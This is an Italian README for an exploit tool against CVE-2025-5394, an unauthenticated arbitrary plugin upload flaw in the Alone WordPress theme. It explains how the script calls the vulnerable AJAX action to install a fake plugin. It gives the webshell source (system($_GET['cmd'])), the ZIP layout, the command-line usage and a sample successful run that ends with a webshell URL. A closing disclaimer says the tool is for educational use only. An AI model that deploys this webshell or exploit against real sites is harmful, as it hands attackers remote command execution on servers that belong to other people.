
Alone – Tema WordPress multiuso non-profit per beneficenza <= 7.8.3 - Mancanza di autorizzazione per il caricamento arbitrario di file non autenticato tramite installazione di plugin
Alone – Tema WordPress Multipurpose Non-profit per Beneficenza
Versioni: <= 7.8.3
CVE: CVE-2025-5394
Punteggio CVSS: 9.8 (Critico)
Il tema Alone per WordPress è vulnerabile al caricamento arbitrario di file a causa di un controllo delle autorizzazioni mancante sulla funzione alone_import_pack_install_plugin().
Questa falla consente ad attaccanti non autenticati di caricare file ZIP (travestiti da plugin) da posizioni remote, ottenendo potenzialmente esecuzione di codice remoto.
Questo repository contiene uno script Python che automatizza lo sfruttamento di CVE-2025-5394.
Lo script attiva l'azione AJAX vulnerabile e carica un plugin falso (contenente una webshell) direttamente sul server WordPress.
Il file ZIP caricato deve seguire questa struttura:
shell_plugin.zip
└── shell_plugin
└── shell_plugin.php
Dove:
shell_plugin è la directory del plugin.shell_plugin.php è un file di plugin PHP valido con un'intestazione di plugin.Esempio di intestazione minima di plugin all'interno di shell_plugin.php:
<?php
/*
Plugin Name: Webshell
*/
system($_GET['cmd']);
?>
python3 CVE-2025-5394.py -help
usage: CVE-2025-5394.py [-h] -u URL -s SHELL
CVE-2025-5394 Exploit | by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL
-s, --shell SHELL ZIP file URL containing webshell (.zip)
python3 CVE-2025-5394.py -u http://target.com/wordpress/ -s http://target.com/shell_plugin.zip
[>] Target : http://target.com/wordpress
[>] Shell URL : http://target.com/shell.php
[>] Plugin Slug : shell_plugin
[>] Sending exploit...
[+] Exploit successful
[+] Webshell URL : http://target.com/wordpress/wp-content/plugins/shell_plugin/shell_plugin.php
Questo script è fornito esclusivamente per scopi educativi e di ricerca.
L'autore declina ogni responsabilità per qualsiasi uso improprio o attività illegale compiuti utilizzando questo codice.
Usalo solo su sistemi di tua proprietà o per cui hai esplicita autorizzazione a effettuare test.
Nxploited ( Khaled Alenazi )
GitHub: https://github.com/Nxploited